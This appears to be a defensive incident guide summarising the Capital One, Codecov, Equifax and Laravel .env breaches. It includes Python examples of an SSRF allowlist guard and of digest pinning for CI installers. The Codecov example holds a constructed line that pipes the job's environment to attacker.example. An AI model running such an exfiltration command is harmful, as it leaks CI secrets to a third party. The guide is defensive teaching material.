Incident Field Guide
Real web breaches broken down into cause, impact, first response, and prevention — so the same mistake doesn't happen twice.
AI-written code leaked an API key and ran up fraudulent charges — the real cause was an unpatched CVSS 10.0
The bill spike was a symptom. The real cause was an unpatched, publicly disclosed CVSS 10.0 RCE that the leaked key merely made easier to monetize. An anonymized case, distilled into defensive lessons.
Capital One breach (2019) — how SSRF leaked 100M+ records, and how to defend
A single SSRF reached the EC2 instance metadata endpoint → temporary credentials for the over-privileged IAM role attached to the instance → bulk S3 copy, leaking ~106M records. Each hop was a chance to stop it. In your environment: require IMDSv2, scope the instance role to least privilege, and allowlist the hosts your servers may fetch from.
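The "allowlist for outbound fetches" above is the hop an application can close on its own. The following is an added example, not Capital One's code or any library's API: a guard that only fetches from an allowlisted set of hostnames (the names in ALLOWED_HOSTS are hypothetical), refuses IP literals outright, and re-checks the resolved addresses so an allowlisted name that resolves to the metadata range or another internal network is still blocked. It goes beyond the single case in the text by handling IPv6, IPv4-mapped IPv6 and non-http schemes as well.

```python
"""SSRF guard for server-side fetches (added example, hypothetical allowlist).

Checks a user-supplied URL before the application fetches it:
  1. only http/https,
  2. no IP literals (they bypass any hostname allowlist),
  3. hostname must be on the allowlist,
  4. every address the name resolves to must be outside metadata,
     loopback, link-local and private ranges.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

# Hypothetical allowlist: the only hosts this service is permitted to fetch from.
ALLOWED_HOSTS = {"images.example.com", "api.partner.example"}

# Ranges that user-controlled URLs must never reach. 169.254.0.0/16 contains
# the cloud metadata endpoint 169.254.169.254; 100.64.0.0/10 is used by some
# providers' metadata services as well.
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "169.254.0.0/16", "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12",
    "192.168.0.0/16", "100.64.0.0/10", "0.0.0.0/8",
    "::1/128", "fe80::/10", "fc00::/7",
)]


def is_blocked_ip(ip_text):
    """True if the address is internal, loopback, link-local or a metadata range."""
    ip = ipaddress.ip_address(ip_text)
    # ::ffff:169.254.169.254 is still the IPv4 metadata address.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return any(ip in net for net in BLOCKED_NETS)


def default_resolver(host):
    """Resolve a hostname to all of its A/AAAA addresses (real DNS)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def check_fetch_target(url, resolver=default_resolver):
    """Return (allowed, reason, resolved_ips).

    Callers must connect to one of resolved_ips (sending the original Host
    header) instead of resolving again; otherwise a DNS-rebinding attacker can
    swap in an internal address between this check and the connection.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed: %r" % parts.scheme, []
    host = parts.hostname          # already lowercased, brackets stripped for IPv6
    if not host:
        return False, "no host in URL", []
    try:
        ipaddress.ip_address(host)
        return False, "IP literals are not allowed; use an allowlisted hostname", []
    except ValueError:
        pass                       # not a literal, continue with hostname checks
    if host.rstrip(".") not in ALLOWED_HOSTS:
        return False, "host not in allowlist: %s" % host, []
    try:
        ips = resolver(host)
    except (socket.gaierror, OSError) as exc:
        return False, "resolution failed: %s" % exc, []
    for ip in ips:
        if is_blocked_ip(ip):
            return False, "%s resolves to blocked address %s" % (host, ip), []
    return True, "ok", ips


if __name__ == "__main__":
    # Stub resolver so the demonstration runs offline.
    for url, res in [
        ("http://169.254.169.254/latest/meta-data/", None),
        ("http://images.example.com/a.png", lambda h: ["203.0.113.7"]),
        ("http://images.example.com/a.png", lambda h: ["10.0.0.5"]),
    ]:
        print(url, check_fetch_target(url, resolver=res or default_resolver))
```

The resolver is injectable so the guard can be unit-tested without DNS; the reason string is meant for logs, not for the end user, since echoing it back tells an attacker exactly which range you block.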
Codecov breach (2021) — when a 'trusted tool' in CI was hijacked and secrets leaked
A trusted CI tool (the curl|bash Bash Uploader) was altered upstream. Because your own code was untouched, the change went unnoticed for ~2 months while CI secrets leaked; a customer comparing the served script's checksum against the hash published in the project's repository caught it. In your CI: verify fetched artifacts against a pinned digest before executing them, give jobs least-privilege secrets, rotate them, and monitor egress.
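Verifying a fetched artifact against a pinned digest is the one control that would have failed closed here. The following is an added example, not Codecov's uploader or any vendor's code: the script bytes, the injected line and the pinned digest are constructed for illustration (in a real pipeline the pin is a literal hex string committed to the repository and changed only on a deliberate upgrade), and the fetch and executor callables stand in for the download and the bash invocation.

```python
"""Pin-and-verify for a curl|bash style installer (added example).

The CI job downloads the script, compares its SHA-256 with a pinned digest,
and only then hands it to bash. A tampered copy, even one that differs by a
single appended line, is refused before anything runs.
"""
import hashlib
import hmac
import subprocess

# Constructed stand-in for the script a CI job would download.
GOOD_UPLOADER = (
    b"#!/bin/sh\n"
    b"# upload coverage report\n"
    b"curl -sS -F file=@coverage.xml https://upload.example/\n"
)

# Same script with a constructed injected line that ships the job's
# environment (and every secret in it) to a third party.
TAMPERED_UPLOADER = GOOD_UPLOADER + (
    b"curl -s -d \"$(env)\" https://attacker.example/collect || true\n"
)


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


# Computed here only so the example is self-contained; in practice this is a
# reviewed hex literal, not something derived from whatever was downloaded.
PINNED_SHA256 = sha256_hex(GOOD_UPLOADER)


def verify_artifact(data, expected_hex):
    """Constant-time comparison of the artifact digest with the pinned value."""
    return hmac.compare_digest(sha256_hex(data), expected_hex.strip().lower())


def fetch_verified(fetch, expected_hex):
    """fetch() returns the downloaded bytes. They are returned only if they
    match the pin, so unverified content never reaches the interpreter."""
    data = fetch()
    if not verify_artifact(data, expected_hex):
        raise RuntimeError(
            "artifact digest %s does not match pinned %s; refusing to execute"
            % (sha256_hex(data), expected_hex)
        )
    return data


def run_installer(fetch, expected_hex, executor=None):
    """Download, verify, then execute. executor defaults to feeding the script
    to bash on stdin and returning its exit code; tests pass a stub."""
    script = fetch_verified(fetch, expected_hex)
    if executor is None:
        def executor(s):
            return subprocess.run(["bash", "-s"], input=s, check=False).returncode
    return executor(script)


if __name__ == "__main__":
    print("pinned:", PINNED_SHA256)
    print("good   matches:", verify_artifact(GOOD_UPLOADER, PINNED_SHA256))
    print("tamper matches:", verify_artifact(TAMPERED_UPLOADER, PINNED_SHA256))
```

The same check works for any downloaded installer, container image or binary; what matters is that the digest comes from a source you reviewed and committed, not from a file served next to the artifact by the same host that could be serving the tampered copy.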
Equifax breach (2017) — how an unpatched Apache Struts flaw leaked data on 147M people
The cause was a known, already-patched CVE (CVSS 10.0) left unapplied on a public-facing system. An expired certificate on the traffic-inspection device meant encrypted exfiltration went uninspected for 76 days. In your environment: an asset inventory, a patch SLA, certificate-expiry monitoring, and detection that is verified to be working.
Laravel apps' .env was readable by the whole world — the most common shared-hosting mistake
The cause: the whole application, .env included, sat under the web root, when only public/ should be served. Fix in three steps — .htaccess as first aid, rotate every secret in .env (APP_KEY, database and API credentials), then restructure so the document root is public/ — and prevent a repeat with process.